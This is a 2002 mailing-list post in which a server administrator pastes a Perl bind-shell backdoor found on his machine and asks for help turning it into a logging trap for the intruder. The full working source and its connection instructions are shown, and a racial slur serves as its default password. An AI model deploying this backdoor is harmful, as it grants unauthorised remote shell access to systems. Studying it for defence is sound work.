On Thu, 3 Jan 2002, Michael O'Donnell wrote:
> > Also, if there's a perl/networking guru, I'm looking to re-write
> > the trojan to look like it's working, but instead be logging the
> > intruder's actions, IP, etc. It's a simple backdoor (only about 2.5
> > pages printed), so I might even be able to figure it out myself...
>
>
> Post a copy of the original here, please - it sounds interesting.
Ok... It's pasted below. I have not edited it at all from the way it
was put on my server.
=============CUT HERE===================
#!/usr/bin/perl -w
#
# Division7 d00r...backdoor coded in perl
# by pHrail
#
# To make the password do
# perl -e 'print crypt("YOUR_PASS","2_CHAR_SALT");'
# Default is perl -e 'print crypt("nigger","d7");'
# ./bindme.pl 999 &
# $ nc localhost 999
# Password :
# nigger
# (pHrail@DIVISION7:/home/pHrail)
# uid=500(pHrail) gid=544(pHrail) groups=544(pHrail)
use Socket;
use strict;
#Define your encrypted password here
my $crypt_pass = "d79hW9urgf/wI";
my $argsnum = @ARGV;
my $port = $ARGV[0];
$port = 999 unless $port;
my $proto = getprotobyname('tcp');
my $system = 'echo "(`whoami`@`uname -n`:`pwd`)";id ; /bin/sh'; #if /bin/sh isn't on
system specify path to a real shell
my $passask = 'echo "Password :"';
my $nuhuh = 'echo "Nuh Uh Biatch, bye bye"';
if ($argsnum < 0 || $argsnum > 1) {
&usage();
exit;
}
socket(SERVER, PF_INET, SOCK_STREAM, $proto)
or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))
or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(; my $paddr = accept(CLIENT, SERVER); close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($passask);
my $password = shift;
recv CLIENT,$password,9,0;
chop($password);
if($crypt_pass =~ crypt($password,substr($crypt_pass,0,2))) {
if (fork()) {
system($system);
exit(0);
}
} else {
system($nuhuh);
}
close(STDIN);
close(STDOUT);
close(STDERR);
}
sub usage {
print "Division7 Door By pHrail\n";
print "Usage $0 <port to listen on> &\n";
print "Listens on default port 999\n";
print "OS: $^O\n";
system('date');
}
=========CUT HERE ==========================
If anyone wants to make this into a trap for the cracker, let me know
and I'll test it.
Brian
---------------------------------------------------------------
| [EMAIL PROTECTED] Spam me and DIE! |
| http://www.datasquire.net |
| Co-Founder & Co-Owner of |
| Data Squire Internet Services |
---------------------------------------------------------------
*****************************************************************
To unsubscribe from this list, send mail to [EMAIL PROTECTED]
with the text 'unsubscribe gnhlug' in the message body.
*****************************************************************